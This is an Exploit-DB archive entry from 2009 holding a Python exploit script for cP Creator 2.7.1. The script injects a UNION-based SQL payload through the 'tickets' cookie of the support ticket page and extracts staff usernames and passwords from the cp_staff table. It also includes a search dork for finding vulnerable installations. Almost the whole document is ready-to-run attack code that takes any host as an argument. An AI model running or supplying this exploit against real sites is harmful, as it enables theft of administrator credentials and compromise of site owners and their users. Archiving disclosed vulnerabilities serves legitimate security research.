cP Creator 2.7.1 - SQL Injection

EDB-ID:

9726




Platform:

Multiple

Date:

2009-09-21


#!/usr/bin/python
#####################################################################################
####                  cP Creator v2.7.1 Remote Sql Injection                     ####
#####################################################################################
#                                                                                   #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm)                                                #
#Discovered by : Sina Yazdanmehr (R3d.W0rm)                                         #
#Our Site : http://IrCrash.com  -> (Coming Soon Again)                              #
#My Official WebSite : http://R3dW0rm.ir                                            #
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr)            #
#####################################################################################
#                                                                                   #
#Download : http://www.cpcreator.net                                                #
#                                                                                   #
#Dork : Powered by cP Creator v2.7.1                                                #
#                                                                                   #
#*** Magic Quotes gpc = Off ***                                                     #
#                                                                                   #
###################################### TNX GOD ######################################
import sys,httplib
p = ''
if len(sys.argv) < 3 :
    print "\nPowered by : R3d.W0rm"
    print "Http://IrCrash.Com - Http://R3dW0rm.Ir"
    print "Usage : code.py [host] /[path]"
    exit()
co = {"Cookie": "tickets=-999' union select 0,concat(0x265E21402A,user,0x3A,pass,0x265E21402A),2,3,4,5,6,7,8 from cp_staff/*;"}
c = httplib.HTTPConnection(sys.argv[1],80)
c.request("GET", "/" + sys.argv[2] + "/?page=support&task=ticket", p, co)
data = c.getresponse().read()
if "&^!@*" not in data :
    print "Attack Failed ."
    exit()
output = data.split("&^!@*")
print "\n+-------------------------------------+"
print "\nPowered by : R3d.W0rm"
print "Http://IrCrash.Com - Http://R3dW0rm.Ir\n"
print "+-------------------------------------+"
print "\n " + output[1]

# milw0rm.com [2009-09-21]